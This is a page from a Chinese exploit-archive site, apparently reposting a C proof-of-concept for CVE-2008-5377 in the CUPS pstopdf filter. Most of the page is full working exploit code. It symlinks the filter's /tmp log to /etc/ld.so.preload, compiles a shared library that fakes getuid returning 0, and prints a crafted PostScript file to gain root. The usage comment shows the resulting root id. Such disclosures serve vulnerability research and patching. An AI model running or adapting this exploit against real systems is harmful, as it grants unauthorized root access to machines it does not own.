首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
CUPS < 1.3.8-4 (pstopdf filter) Privilege Escalation Exploit
来源:http://jon.oberheide.org 作者:Oberheide 发布时间:2008-12-24  

/*
 * cve-2008-5377.c
 *
 * CUPS < 1.3.8-4 pstopdf filter exploit
 * Jon Oberheide <jon@oberheide.org>
 * http://jon.oberheide.org
 *
 * Usage:
 *
 *   $ gcc cve-2008-5377.c -o cve-2008-5377.c
 *   $ ./cve-2008-5377
 *   $ id
 *   uid=0(root) gid=1000(vm) ...
 *
 * Information:
 *
 *   http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-5377
 *
 *   pstopdf in CUPS 1.3.8 allows local users to overwrite arbitrary files via
 *   a symlink attack on the /tmp/pstopdf.log temporary file.
 *
 * Operation:
 *
 *   The exploit creates and prints a malformed postscript document that will
 *   cause the CUPS pstopdf filter to write an error message out to its log
 *   file that contains the string /tmp/getuid.so.  However, since we also
 *   symlink the pstopdf log file /tmp/pstopdf.log to /etc/ld.so.preload, the
 *   error message and malicious shared library path will be appended to the
 *   ld.so.preload file, allowing us to elevate privileges to root.
 *
 * Note:
 *
 *   This exploit only works under the (rare) conditions that cupsd executes
 *   external filters as a privileged user, a printer on the system uses the
 *   pstopdf filter (e.g. the pdf.ppd PDF converter). Also, /etc/ld.so.preload
 *   must be world readable.
 */

#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/wait.h>

int
main(void)
{
 int ret;
 FILE *fp;
 struct stat log;

 fp = fopen("/tmp/cve-2008-5377.ps", "w");
 if(!fp) {
  printf("error: cannot open /tmp/cve-2008-5377.ps\n");
  goto cleanup;
 }
 fprintf(fp, "%%!PS-Adobe-2.0 EPSF-2.0\n( /tmp/getuid.so ) CVE-2008-5377\n");
 fclose(fp);

 fp = fopen("/tmp/getuid.c", "w");
 if(!fp) {
  printf("error: cannot open /tmp/getuid.c\n");
  goto cleanup;
 }
 fprintf(fp, "int getuid(){return 0;}\n");
 fclose(fp);

 ret = system("cc -shared /tmp/getuid.c -o /tmp/getuid.so");
 if (WEXITSTATUS(ret) != 0) {
  printf("error: cannot compile /tmp/getuid.c\n");
  goto cleanup;
 }

 unlink("/tmp/pstopdf.log");
 ret = stat("/tmp/pstopdf.log", &log);
 if (ret != -1) {
  
  printf("error: /tmp/pstopdf.log already exists\n");
  goto cleanup;
 }

 ret = symlink("/etc/ld.so.preload", "/tmp/pstopdf.log");
 if (ret == -1) {
  printf("error: cannot symlink /tmp/pstopdf.log to /etc/ld.so.preload\n");
  goto cleanup;
 }

 ret = system("lp < /tmp/cve-2008-5377.ps");
 if (WEXITSTATUS(ret) != 0) {
  printf("error: could not print /tmp/cve-2008-5377.ps\n");
  goto cleanup;
 }

cleanup:
 unlink("/tmp/cve-2008-5377.ps");
 unlink("/tmp/getuid.c");
 return 0;
}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Mozilla Firefox 3.0.5 location
·Psi Jabber Client (8010/tcp) R
·SolarCMS 0.53.8 (Forum) Remote
·PGP Desktop 9.0.6 (PGPwded.sys
·CoolPlayer 2.19 (Skin File) Lo
·CMS NetCat 3.12 (password_reco
·YourPlace <= 1.0.2 Multiple Re
·RoundCube Webmail <= 0.2b Remo
·Pligg 9.9.5b (check_url.php ur
·CMS NetCat 3.12 (password_reco
·RSS Simple News (news.php pid)
·Getleft 1.2 Remote Buffer Over
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved